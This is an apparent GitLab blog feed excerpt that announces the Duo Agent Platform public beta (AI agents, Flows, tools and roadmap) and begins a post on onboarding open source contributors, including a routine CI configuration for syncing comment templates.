<p>This first beta focuses on unlocking the IDE experience through the GitLab VS Code extension and JetBrains IDEs plug-in; next month, we plan on bringing the Duo Agent Platform experience to the GitLab application and expand our IDE support. Let me share a bit more about our vision for the roadmap between now and general availability, planned for later this year. You can find details about the first beta down below.</p>
<p>Watch this video or read on for what's available now and what's to come. Then, if you're ready to get started with Duo Agent Platform, <a href="#get-started-now">find out how with the public beta</a>.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101993507?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;GitLab Agent Platform Beta Launch_071625_MP_v2&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>GitLab's unique position as an orchestration platform</h2>
<p>GitLab sits at the heart of the development lifecycle as the system of record for engineering teams, orchestrating the entire journey from concept to production for over 50 million registered users, including half of the Fortune 500 across geographies. This includes over 10,000 paying customers across all segments and verticals, including public institutions.</p>
<p>This gives GitLab something no competitor can match: a comprehensive understanding of everything it takes to deliver software. We bring together your project plans, code, test runs, security scans, compliance checks, and CI/CD configurations to not only power your team but also orchestrate collaboration with AI agents you control.</p>
<p>As an intelligent, unified DevSecOps platform, GitLab stores all of the context about your software engineering practice in one place. We will expose this unified data to AI agents via our knowledge graph. Every agent we build has automatic access to this SDLC-connected data set, providing rich context so agents can make informed recommendations and take actions that adhere to your organizational standards.</p>
<p><strong>Here's an example of this advantage in action.</strong> Have you ever tried to figure out exactly how a project is going across dozens, if not hundreds, of stories and issues being worked on across all the developers involved? Our Deep Research Agent leverages the GitLab Knowledge Graph and semantic search capabilities to traverse your epic and all related issues, and explore the related codebase and surrounding context. It quickly correlates information across your repositories, merge requests, and deployment history. This delivers critical insights that standalone tools can't match and that would take human developers hours to uncover.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101998114?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Deep Research Demo_071625_MP_v1&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Our strategic evolution from AI features to agent orchestration</h2>
<p>GitLab Duo started as an add-on, bringing generative AI to developers through Duo Pro and Enterprise. With GitLab 18.0, it's now built into the platform. We've unlocked <a href="https://about.gitlab.com/blog/gitlab-duo-chat-gets-agentic-ai-makeover/">Duo Agentic Chat</a> and Code Suggestions for all Premium and Ultimate users, and now we're providing immediate access to the Duo Agent Platform.</p>
<p>We've ramped up engineering investment and are accelerating delivery, with powerful new AI features landing every month. But we're not just building another coding assistant. GitLab Duo is becoming an agent orchestration platform, where you can create, customize, and deploy AI agents that work alongside you and interoperate easily with other systems, dramatically increasing productivity.</p>
<blockquote>
<p><strong>“GitLab Duo Agent Platform enhances our development workflow with AI that truly understands our codebase and our organization. Having GitLab Duo AI agents embedded in our system of record for code, tests, CI/CD, and the entire software development lifecycle boosts productivity, velocity, and efficiency. The agents have become true collaborators to our teams, and their ability to understand intent, break down problems, and take action frees our developers to tackle the exciting, innovative work they love.”</strong> - Bal Kang, Engineering Platform Lead at NatWest</p>
</blockquote>
<h3>Agents that work out of the box</h3>
<p>We are introducing agents that mirror familiar team roles. These agents can search, read, create, and modify existing artifacts across GitLab. Think of these as agents you can interact with individually, that also act as building blocks that you can customize to create your own agents. Like your team members, agents have defined specializations, such as software development, testing, or technical writing. As specialists, they're tapping into the right context and tools to consistently accomplish the same types of tasks, wherever they're deployed.</p>
<p>Here are some of the agents we're building today:</p>
<ul>
<li><strong>Chat Agent (now in beta):</strong> Takes natural language requests to provide information and context to the user. Can perform general development tasks, such as reading issues or code diffs. As an example, you can ask Chat to debug a failed job by providing the job URL.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1102616311?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-chat-in-web-ui-demo_Update V2&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li>
<p><strong>Software Developer Agent (now in beta):</strong> Works on assigned items by creating code changes in virtual development environments and opening merge requests for review.</p>
</li>
<li>
<p><strong>Product Planning Agent:</strong> Prioritizes product backlogs, assigns work items to human and agentic team members, and provides project updates over specified timelines.</p>
</li>
<li>
<p><strong>Software Test Engineer Agent:</strong> Tests new code contributions for bugs and validates if reported issues have been resolved.</p>
</li>
<li>
<p><strong>Code Reviewer Agent:</strong> Performs code reviews following team standards, identifies quality and security issues, and can merge code when ready.</p>
</li>
<li>
<p><strong>Platform Engineer Agent:</strong> Monitors GitLab deployments, including GitLab Runners, tracks CI/CD pipeline health, and reports performance issues to human platform engineering teams.</p>
</li>
<li>
<p><strong>Security Analyst Agent:</strong> Finds vulnerabilities within codebases and deployed applications, and implements code and configuration changes to help resolve security weaknesses.</p>
</li>
<li>
<p><strong>Deployment Engineer Agent:</strong> Deploys updates to production, monitors for unusual behavior, and rolls back changes that impact application performance or security.</p>
</li>
<li>
<p><strong>Deep Research Agent:</strong> Conducts comprehensive, multi-source analysis across your entire development ecosystem.</p>
</li>
</ul>
<p>What makes these agents powerful is their native access to GitLab's comprehensive toolkit. Today, we have over 25 tools, from issues and epics to merge requests and documentation, with more to come. Unlike external AI tools that operate with limited context, our agents work as true team members with full platform privileges under your supervision.</p>
<p>In the coming months, you'll also be able to modify these agents to meet the needs of your organization. For example, you'll be able to specify that a Software Test Engineer Agent follows best practices for a particular framework or methodology, deepening its specialization and turning it into an even more valuable team member.</p>
<h2>Flows orchestrate complex agent tasks</h2>
<p>On top of individual agents, we are introducing agent Flows. Think of these as more complex workflows that can include multiple agents with pre-built instructions, steps, and actions for a given task that can run autonomously.</p>
<p>While you can create Flows for basic tasks common to individuals, they truly excel when applied to complex, specialized tasks that would normally take hours of coordination and effort to complete. Flows will help you finish complex tasks faster and, in many cases, asynchronously without human intervention.</p>
<p>Flows have specific triggers for execution. Each Flow contains a series of steps, and each step has detailed instructions that tell a specialized agent what to do. This granular approach allows  you to give precise instructions to agents in the Flow. By defining instructions in greater detail and establishing structured decision points, Flows can help solve for the inherent variability in AI responses while eliminating the need to repeatedly specify the same requirements, unlocking more consistent and predictable outcomes without user configuration.</p>
<p>Here are some examples of out-of-the-box Flows that we are building:</p>
<ul>
<li>
<p><strong>Software Development Flow (now in beta):</strong> Orchestrates multiple agents to plan, implement, and test code changes end-to-end, helping transform how teams deliver features from concept to production.</p>
</li>
<li>
<p><strong>Issue-to-MR Flow:</strong> Automatically converts issues into actionable merge requests by coordinating agents to analyze requirements, prepare comprehensive implementation plans, and generate code.</p>
</li>
<li>
<p><strong>Convert CI File Flow:</strong> Streamlines migration workflows by having agents analyze existing CI/CD configurations and intelligently convert them to GitLab CI format with full pipeline compatibility.</p>
</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101941425?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;jenkins-to-gitlab-cicd-for-blog&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li>
<p><strong>Search and Replace Flow:</strong> Discovers and transforms code patterns across codebases by systematically analyzing project structures, identifying optimization opportunities, and executing precise replacements.</p>
</li>
<li>
<p><strong>Incident Response &amp; Root Cause Analysis Flow:</strong> Orchestrates incident response by correlating system data, coordinating specialized agents for root cause analysis, and executing approved remediation steps while keeping human stakeholders informed throughout the resolution process.</p>
</li>
</ul>
<p>This is where GitLab Duo Agent Platform is taking a truly unique approach versus other AI solutions. We won't just give you pre-built agents. We'll also give you the power to create, customize, and share agent Flows that perfectly match your individual and organization's unique needs. And with Flows, you will then be able to give agents a specific execution plan for common and complex tasks.</p>
<p>We believe this approach is more powerful than building purpose-built agents like our competitors do, because every organization has different workflows, coding standards, security requirements, and business logic. Generic AI tools can't understand your specific context, but GitLab Duo Agent Platform will be able to be tailored to work exactly how your team works.</p>
<h2>Why build agents and agent Flows in the GitLab Duo Agent Platform?</h2>
<p><strong>Build fast.</strong> You can build agents and complex agent Flows in the Duo Agent Platform quickly and easily using a fast, declarative extensibility model and UI assistance.</p>
<p><strong>Built-in compute.</strong> With Duo Agent Platform, you no longer have to worry about the hassle of standing up your own infrastructure for agents: compute, network, and storage are all built-in.</p>
<p><strong>SDLC events.</strong> Your agents can be invoked automatically on common events: broken pipeline, failed deployment, issue created, etc.</p>
<p><strong>Instant access.</strong> You can interact with your agents everywhere in GitLab or our IDE plug-in: assign them issues, @mention them in comments, and chat with them everywhere Duo Chat is available.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1102029239?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;assigning an agent an issue&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt; &lt;p&gt;&lt;/p&gt;</p>
<p><strong>Built-in and custom models supported.</strong> Your agents will have automatic access to all of the models we support, and users will be able to choose specific models for specific tasks. If you want to connect Duo Agent Platform to your own self-hosted model, you will be able to do that too!</p>
<p><strong>Model Context Protocol (MCP) endpoints.</strong> Every agent and Flow can be accessed or triggered via native MCP endpoints, allowing you to connect to and collaborate with your agents and Flows from anywhere, including popular tools like Claude Code, Cursor, Copilot, and Windsurf.</p>
<p><strong>Observability and security.</strong> Finally, we provide built-in observability and usage dashboards, so you can see exactly who, where, what, and when agents took actions on your behalf.</p>
<h2>A community-driven future</h2>
<p>Community contributions have long fueled GitLab's innovation and software development. We're excited to partner with our community with the introduction of the AI Catalog. The AI Catalog will allow you to create and share agents and Flows within your organization and across the GitLab Ecosystem in our upcoming beta.</p>
<p>We believe that the most valuable AI applications are likely to emerge from you, our community, thanks to your daily application of GitLab Duo Agent Platform to solve numerous real-world use cases. By enabling seamless sharing of agents and Flows, we're creating a network effect where each contribution enhances the platform's collective intelligence and value. Over time, we believe that the most valuable use cases from Agent Platform will come from our thriving GitLab community.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685501/awdwx08udwrxgvcpmssb.png" alt="AI Catalog" title="AI Catalog"></p>
<h2>Available today in the GitLab Duo Agent Platform in public beta</h2>
<p>The GitLab Duo Agent Platform public beta is available now to Premium and Ultimate customers with these capabilities:</p>
<p><strong>Software Development Flow:</strong> Our first Flow orchestrates agents in gathering comprehensive context, clarifying ambiguities with human developers, and executing strategic plans to make precise changes to your codebase and repository. It leverages your entire project, including its structure, codebase, and history, along with additional context like GitLab issues or merge requests to amplify developer productivity.</p>
<p><strong>New Agent tools available:</strong> Agents now have access to multiple tools to do their work, including:</p>
<ul>
<li>File System (Read, Create, Edit, Find Files, List, Grep)</li>
<li>Execute Command Line*</li>
<li>Issues (List, Get, Get Comments, Edit*, Create*, Add/Update Comments*)</li>
<li>Epics (Get, Get Comments)</li>
<li>MR (Get, Get Comments, Get Diff, Create, Update)</li>
<li>Pipeline (Job Logs, Pipeline Errors)</li>
<li>Project (Get, Get File)</li>
<li>Commits (Get, List, Get Comments, Get Diff)</li>
<li>Search (Issue Search)</li>
<li>Secure (List Vulnerabilities)</li>
<li>Documentation Search</li>
</ul>
<p>*=Requires user approval</p>
<p><strong>GitLab Duo Agentic Chat in the IDE:</strong> Duo Agentic Chat transforms the chat experience from a passive Q&amp;A tool into an active development partner directly in your IDE.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1103237126?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-ai-launch-video_NEW&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Iterative feedback and chat history:</strong> Duo Agentic Chat now supports chat history and iterative feedback, transforming the agent into a stateful, conversational partner. This fosters trust, enabling developers to delegate more complex tasks and offer corrective guidance.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743173?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-chat-history&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Streamlined delegation with slash commands:</strong> Expanded, more powerful slash commands, such as /explain, /tests, and /include, create a “delegation language” for quick and precise intent. The /include command allows the explicit injection of context from specific files, open issues, merge requests, or dependencies directly into the agent's working memory, making the agent more powerful and teaching users how to provide optimal context for high-quality responses.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743187?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;include-agentic-chat-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Personalization through custom rules:</strong> New Custom Rules enables developers to tailor agent behavior to individual and team preferences using natural language, for example, development style guides. This foundational mechanism shapes the agent's persona into a personalized assistant, evolving toward specialized agents based on user-defined preferences and organizational policies.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743179?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;custom-rules-with-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Support for GitLab Duo Agentic Chat in JetBrains IDE:</strong> To help meet developers where they work, we have expanded Duo Agentic Chat support to the JetBrains family of IDEs, including IntelliJ, PyCharm, GoLand, and Webstorm. This adds to our existing support for VS Code. Existing users get agentic capabilities automatically, while new users can install the plugin from the JetBrains Marketplace.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743193?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;jetbrains-support-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>MCP client support:</strong> Duo Agentic Chat can now act as an MCP client, connecting to remote and locally running MCP servers. This capability unlocks the agent's ability to connect to systems beyond GitLab like Jira, ServiceNow, and ZenDesk to gather context or take actions. Any service that exposes itself via MCP can now become part of the agent's skill set. The official GitLab MCP Server is coming soon!</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743202?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;McpDemo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>GitLab Duo Agentic Chat in GitLab Web UI.</strong> Duo Agentic Chat is also now available directly within the GitLab Web UI. This pivotal step evolves the agent from a coding assistant to a true DevSecOps agent, as it gains access to rich non-code context, such as issues and merge request discussions, allowing it to understand the &quot;why&quot; behind the work. Beyond understanding context, the agent can make changes directly from the WebUI, such as automatically updating issue statuses or editing merge request descriptions.</li>
</ul>
<h2>Coming soon to GitLab Duo Agent Platform</h2>
<p>Over the coming weeks, we'll release new capabilities to Duo Agent Platform, including more out-of-the-box agents and Flows. These will bring the platform into the GitLab experience you love today and enable even greater customization and extensibility, amplifying productivity for our customers:</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685275/hjbe9iiu2ydp9slibsc2.png" alt="GitLab Duo Agent Platform public beta roadmap" title="GitLab Duo Agent Platform public beta roadmap"></p>
<ul>
<li>
<p><strong>Integrated GitLab experience:</strong> Building on the IDE extensions available in 18.2, we're expanding agents and Flows within the GitLab platform. This deeper integration will expand the ways you can collaborate synchronously and asynchronously with agents. You will be able to assign issues directly to agents, @mention them within GitLab Duo Chat, and seamlessly invoke them from anywhere in the application while maintaining MCP connectivity from your developer tool of choice. This native integration transforms agents into true development team members, accessible across GitLab.</p>
</li>
<li>
<p><strong>Agent observability:</strong> As agents become more autonomous, we're building comprehensive visibility into their activity as they progress through Flows, enabling you to monitor their decision-making processes, track execution steps, and understand how they're interpreting and acting on your development challenges. This transparency into agent behavior builds trust and confidence while allowing you to optimize workflows and identify bottlenecks, and helps ensure agents are performing exactly as intended.</p>
</li>
<li>
<p><strong>AI Catalog:</strong> Recognizing that great solutions come from community innovation, we will soon introduce the public beta of our AI Catalog — a marketplace which will allow you to extend Duo Agent Platform with specialized Agents and Flows sourced from GitLab, and over time, the broader community.  You'll be able to quickly deploy these solutions in GitLab, leveraging context across your projects and codebase.</p>
</li>
<li>
<p><strong>Knowledge Graph:</strong> Leveraging GitLab's unique advantage as the system of record for source code and its surrounding context, we're building a comprehensive Knowledge Graph that not only maps files and dependencies across the codebase but also makes that map navigable for users while accelerating AI query times and helping increase accuracy. This foundation enables GitLab Duo agents to quickly understand relationships across your entire development environment, from code dependencies to deployment patterns, unlocking faster and more precise responses to complex questions.</p>
</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685367/n0tvfgorchuhrronic3j.png" alt="GitLab Duo Agent Platform Knowledge Graph" title="GitLab Duo Agent Platform Knowledge Graph"></p>
<ul>
<li><strong>Create and edit agents and Flows:</strong> Understanding that every organization has unique workflows and requirements, we're developing powerful agent and Flow creation and editing capabilities that will be introduced as the AI Catalog matures. You'll be able to create and modify agents and Flows to operate precisely the way your organization works, delivering deep customization across the Duo Agent Platform that enables higher quality results and increased productivity.</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752684938/fruwqcqvvrx8gmkz5u0v.png" alt="AI Catalog" title="AI Catalog"></p>
<ul>
<li>
<p><strong>Official GitLab MCP Server:</strong> Recognizing that developers work across multiple tools and environments, we're building an official GitLab MCP server that will enable you to access all of your agents and Flows via MCP. You'll be able to connect to and collaborate with your agents and Flows from anywhere MCP is supported, including popular tools like Claude Code, Cursor, Copilot, and Windsurf, unlocking seamless AI collaboration regardless of your preferred development environment.</p>
</li>
<li>
<p><strong>GitLab Duo Agent Platform CLI:</strong> Our upcoming CLI will allow you to invoke agents and trigger Flows on the command line, leveraging GitLab's rich context across the entire software development lifecycle—from code repositories and merge requests to CI/CD pipelines and issue tracking.</p>
</li>
</ul>
<h2>Get started now</h2>
<ul>
<li>
<p><strong>GitLab Premium and Ultimate customers</strong> in GitLab.com and self-managed environments using GitLab 18.2 can use Duo Agent Platform immediately (beta and experimental features for GitLab Duo <a href="https://docs.gitlab.com/user/gitlab_duo/turn_on_off/#turn-on-beta-and-experimental-features">must be enabled</a>). GitLab Dedicated customers will be able to use the Duo Agent Platform with the release of GitLab 18.2 for Dedicated next month.</p>
</li>
<li>
<p>Users should download the <a href="https://marketplace.visualstudio.com/items?itemName=GitLab.gitlab-workflow">VS Code extension</a> or the <a href="https://plugins.jetbrains.com/plugin/22857-gitlab">JetBrains IDEs plugin</a> and follow our <a href="https://docs.gitlab.com/user/gitlab_duo_chat/agentic_chat/#use-agentic-chat">guide to using GitLab Duo Agentic Chat</a>, including Duo Chat <a href="https://docs.gitlab.com/user/gitlab_duo_chat/examples/#gitlab-duo-chat-slash-commands">slash commands</a>.</p>
</li>
</ul>
<p><strong>New to GitLab?</strong> See GitLab Duo Agent Platform in action at our Technical Demo, offered in two timezone-friendly sessions: <a href="https://page.gitlab.com/webcasts-jul16-gitlab-duo-agentic-ai-emea-amer.html">Americas and EMEA</a> and <a href="https://page.gitlab.com/webcasts-jul24-gitlab-duo-agentic-ai-apac.html">Asia-Pacific</a>. To get hands-on with GitLab Duo Agent Platform yourself, sign up for a <a href="https://gitlab.com/-/trials/new?glm_content=default-saas-trial&amp;glm_source=about.gitlab.com%2Fsales%2F">free trial</a> today.</p>
<p>&lt;small&gt;<em>This blog post contains “forward-looking statements” within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in the forward-looking statements contained in this blog post are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to be materially different from any future results or outcomes expressed or implied by the forward-looking statements.</em></p>
<p><em>Further information on risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this blog post are included under the caption “Risk Factors” and elsewhere in the filings and reports we make with the Securities and Exchange Commission. We do not undertake any obligation to update or release any revisions to any forward-looking statement or to report any events or circumstances after the date of this blog post or to reflect the occurrence of unanticipated events, except as required by law.</em>&lt;/small&gt;</p>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-07-17T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[How we use GitLab to grow open source communities]]></title>
        <id>https://about.gitlab.com/blog/how-we-use-gitlab-to-grow-open-source-communities/</id>
        <link href="https://about.gitlab.com/blog/how-we-use-gitlab-to-grow-open-source-communities/"/>
        <updated>2025-07-15T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab's Contributor Success team faced a challenge.
While our returning open source contributors were merging more code changes and collaborating on deeper features, first-time contributors were struggling to get started. We knew many newcomers to open source often gave up or never asked for help. But as advocates for <a href="https://handbook.gitlab.com/handbook/company/mission/">GitLab's mission</a>
to enable everyone to contribute, we wanted to do better.</p>
<p>We started running research studies on open source contributors to GitLab. Then we improved the stumbling blocks. In January, we achieved a record of 184 unique community contributors to GitLab in a single month,
exceeding our team target of 170 for the first time.</p>
<p>Three months later, we broke it again with 192.</p>
<p>Here's how we used GitLab's own tools to solve the newcomer dilemma and grow our open source community.</p>
<h2>What we learned studying first-time contributors</h2>
<p>In 2023, we conducted the first-ever user study of GitLab open source contributors.
We watched six participants who had never contributed to GitLab make their first attempt. They completed diary studies and Zoom interviews detailing their experience.</p>
<p>Participants told us:</p>
<ul>
<li>The contributor documentation was confusing</li>
<li>Getting started felt overwhelming</li>
<li>It wasn't clear how or where to find help</li>
</ul>
<p>Only one out of the six participants successfully merged a code contribution to GitLab during the study.</p>
<p>It became clear we needed to focus on the onboarding experience if we wanted new contributors to succeed.
So we <a href="https://handbook.gitlab.com/handbook/values/#iteration">iterated</a>!</p>
<p>Our team spent the next year addressing their challenges. We used GitLab tools,
such as issue templates, scheduled pipelines, webhooks, and the GitLab Query Language (GLQL), to build an innovative semi-automated onboarding solution.</p>
<p>In 2025, we performed a follow-up user study with new participants who had never made a contribution to GitLab. All 10 participants successfully created and merged contributions to GitLab, a 100% success rate. The feedback showed a great appreciation for the new onboarding process, the speed at which
maintainers checked in on contributors, and the recognition we offered to contributors.</p>
<p>Even better, participants shared how much fun they had contributing:
&quot;I felt a little rush of excitement at being able to say 'I helped build GitLab.'&quot;</p>
<h2>We built personal onboarding with GitLab</h2>
<p>Our solution started with engagement.
To help newcomers get started, we introduced a personal onboarding process connecting each
contributor with a community maintainer.</p>
<p>We created an <a href="https://gitlab.com/gitlab-community/meta/-/blob/ac0e5579a6a1cf26e367010bfcf6c7d35b38d4f8/.gitlab/issue_templates/Onboarding.md">issue template</a> with a clear checklist of tasks.</p>
<p>The onboarding issue also handles access approval for the
<a href="https://about.gitlab.com/blog/gitlab-community-forks/">GitLab community forks</a>,
a collection of shared projects that make it easier to push changes, collaborate with others,
and access GitLab Ultimate and Duo features.</p>
<p>Using <a href="https://docs.gitlab.com/user/project/labels/#scoped-labels">scoped labels</a>, we indicate the status of the access request for easy maintainer follow-ups.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/vkiyl0hrfbgcer3nz38r.png" alt="GitLab onboarding issue"></p>
<p>We started with a Ruby script run via a <a href="https://docs.gitlab.com/ci/pipelines/schedules/">scheduled pipeline</a>,
checking for new access requests and using the issue template to create personalized onboarding issues.</p>
<p>From here, our maintainers engage with new contributors to verify access, answer questions, and find issues.</p>
<h2>We standardized responses with comment templates</h2>
<p>With multiple maintainers in the GitLab community, we wanted to ensure consistent and clear messaging.</p>
<p>We created <a href="https://docs.gitlab.com/user/profile/comment_templates/">comment templates</a>,
which we sync with the repository using the GraphQL API and a
<a href="https://gitlab.com/gitlab-community/meta/-/blob/dd6e0c2861c848251424b72e3e8c5603dcaac725/bin/sync_comment_templates.rb">Ruby script</a>.</p>
<p>The script is triggered in <code>.gitlab-ci.yml</code> when comment template changes are pushed
to the default branch (a dry run is triggered in merge requests).</p>
<pre><code class="language-yaml">execute:sync-comment-templates:
  stage: execute
  extends: .ruby
  script:
    - bundle exec bin/sync_comment_templates.rb
  variables:
    SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_ONLY
  rules:
    - if: $CI_PIPELINE_SOURCE == 'schedule' || $CI_PIPELINE_SOURCE == &quot;trigger&quot;
      when: never
    - if: $EXECUTE_SYNC_COMMENT_TEMPLATES == '1'
    - if: $CI_MERGE_REQUEST_IID
      changes:
        - .gitlab/comment_templates/**/*
      variables:
        REPORT_ONLY: 1
    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH
      changes:
        - .gitlab/comment_templates/**/*
      variables:
        FORCE_SYNC: 1
        DRY_RUN: 0
        SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_WRITE
</code></pre>
